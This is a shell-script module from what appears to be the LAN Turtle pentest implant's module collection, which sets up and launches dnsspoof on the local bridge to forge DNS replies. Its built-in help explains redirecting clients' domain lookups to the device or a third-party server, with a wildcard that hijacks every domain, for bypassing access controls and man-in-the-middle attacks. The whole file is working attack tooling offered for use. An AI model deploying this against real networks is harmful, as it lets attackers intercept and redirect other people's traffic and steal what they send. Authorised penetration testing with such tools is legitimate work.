lanturtle-modules/modules/dns-spoof

61 lines
2.2 KiB
Plaintext
Raw Normal View History

#!/bin/bash /usr/lib/turtle/turtle_module
VERSION="1.0"
DESCRIPTION="dnsspoof forges replies to arbitrary DNS address / pointer queries on the LAN. This is useful in bypassing hostname-based access controls, or in implementing a variety of man-in-the-middle attacks."
CONF=/tmp/dnsspoof.form
: ${DIALOG_OK=0}
: ${DIALOG_CANCEL=1}
: ${DIALOG_HELP=2}
: ${DIALOG_EXTRA=3}
: ${DIALOG_ITEM_HELP=4}
: ${DIALOG_ESC=255}
function configure {
if [ ! -e /etc/turtle/spoofhost ]; then
touch /etc/turtle/spoofhost
echo -e "172.16.84.1 example.com" > /etc/turtle/spoofhost
fi
dialog \
--help-button \
--title "DNSSpoof Configuration (/etc/turtle/spoofhost)" \
--editbox /etc/turtle/spoofhost 18 72\
2>$CONF
return=$?
case $return in
$DIALOG_OK)
cat $CONF | {
cat $CONF > /etc/turtle/spoofhost
rm $CONF
};;
$DIALOG_HELP)
dialog --title "Help" \
--msgbox "\
DNSSpoof forges replies to arbitrary DNS address / pointer queries on the LAN. This is useful in bypassing hostname-based access controls, or in implementing a variety of man-in-the-middle attacks.\n\n\
For example, the IP address returned for a client lookup of the domain \"example.com\" can be replaced with that of the LAN Turtle itself, or a 3rd party server.\n\n\
In this scenario, the computer connected to the Internet through the LAN Turtle attempting to browse to this domain may be redirected to the spoofed IP.\n\n\
The Spoofhost editor lists the IP address and Domain names to spoof. The default example replaces example.com with the IP address 172.16.84.1 - the LAN Turtle default address.\n\n\
Wildcards may be used in domain names. For example, \"172.16.84.1 example.*\" would spoof all top-level domains for example, such as .com, .net, .org, etc.\n\n\
The wildcard *.* will replace all domains.\
" 20 72
configure
;;
$DIALOG_CANCEL)
rm $CONF;;
$DIALOG_ESC)
rm $CONF;;
esac
}
function start {
echo "dnsspoof -i br-lan -f /etc/turtle/spoofhost > /dev/null 2>/tmp/dnsspoof.log" | at now
}
function stop {
echo "Killing DNSSpoof with pid:"
pidof dnsspoof
killall dnsspoof
}
function status {
if pgrep dnsspoof > /dev/null; then echo "1"; else echo "0"; fi
}